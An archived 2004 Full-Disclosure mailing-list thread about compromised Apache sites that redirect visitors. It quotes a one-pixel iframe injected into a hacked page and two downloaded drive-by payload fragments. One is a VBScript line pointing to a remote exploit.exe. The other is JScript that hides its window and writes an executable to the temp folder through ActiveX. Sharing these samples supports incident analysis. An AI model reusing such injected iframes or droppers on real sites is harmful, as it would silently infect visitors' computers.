Virus.Org  IT Security News and Information Portal. We offer the latest IT security news, updates, product reviews, books, and articles for all you IT security professionals out there. Enter and get the best IT security information on the Internet.

 

. Welcome to the Virus.Org Mailing List Archive  
.
.


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]


Re: [Full-Disclosure] browser hijack by apache sites
.

  • To: [EMAIL PROTECTED]
  • Subject: Re: [Full-Disclosure] browser hijack by apache sites
  • From: D B <[EMAIL PROTECTED]>
  • Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)
  • Cc: [EMAIL PROTECTED]
  • Sender: [EMAIL PROTECTED]
.
 
 using konqueror i got it to download these two files 

Filename 1: 2DimensionOfExploitsEnc.php

<html>

<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe";
</script>

<script language="VBScript.Encode">

Filename 2: object2.cfm

<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);



>Message: 1
>From: Filbert <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Date: Sun, 23 May 2004 15:19:30 +0200
>Organization: Hell
>Subject: [Full-Disclosure] browser hijack by apache
>sites

>Hi,

>This is the second time this weekend that I've been
>warned of an apache 
>site 
>on a Linux server were a line of code was added to
>redirect browsers to  
>porn 
>sites.
>First was the site of a Belgian political party.
>Second came today, and 
>as of 
>writing this it's still there. The admin was informed
>so it can be gone 
>soon.

>hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
>changed to http
>IE users do NOT click.

>the code added at the bottom is:

><iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1

>HEIGHT=1></iframe></body>

>anyone seen this before? What vulnerability is
>exploited here? FP?

>Thx,
>Filb.


	
		
__________________________________
Do you Yahoo!?
Yahoo! Domains ? Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
.
.
 
Copyright (c) Virus.Org 1997-2006.
All Trademarks Acknowledged.
Please view our Terms and Conditions and our Privacy Policy.